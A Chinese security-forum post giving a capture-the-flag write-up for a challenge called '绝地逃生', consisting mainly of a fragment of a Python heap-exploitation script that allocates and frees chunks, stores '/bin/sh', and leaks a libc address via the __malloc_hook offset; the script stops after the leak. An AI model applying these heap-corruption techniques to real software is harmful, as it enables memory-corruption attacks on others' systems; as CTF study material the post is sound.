首页
社区
课程
招聘
[原创]绝地逃生 WP
发表于: 2019-6-26 12:25 5344

[原创]绝地逃生 WP

xym 活跃值
4
2019-6-26 12:25
5344

一血题。

没啥好说的,放WP,注意这个不能保证每次都能成功。

try:

add(0, 0xF8, 'A' * 1)

add(1, 0x68, 'B' * 1)

add(2, 0x68, 'C' * 1)

add(3, 0x68, '/bin/sh\x00' * 1)

for i in range(252):

add(i + 4, 0x10, 'A' * 1)

free(2, 254, 255)

except:

return

show(0)

leak_addr = p.recvuntil('\n1. ',drop = True)

leak_addr = u64(leak_addr.ljust(8, '\x00'))

print 'leak_addr ',hex(leak_addr)

libc.address = leak_addr - 96 - 0x10 - libc.symbols['__malloc_hook']


[峰会]看雪.第八届安全开发者峰会10月23日上海龙之梦大酒店举办!

最后于 2019-6-26 12:26 被xym编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//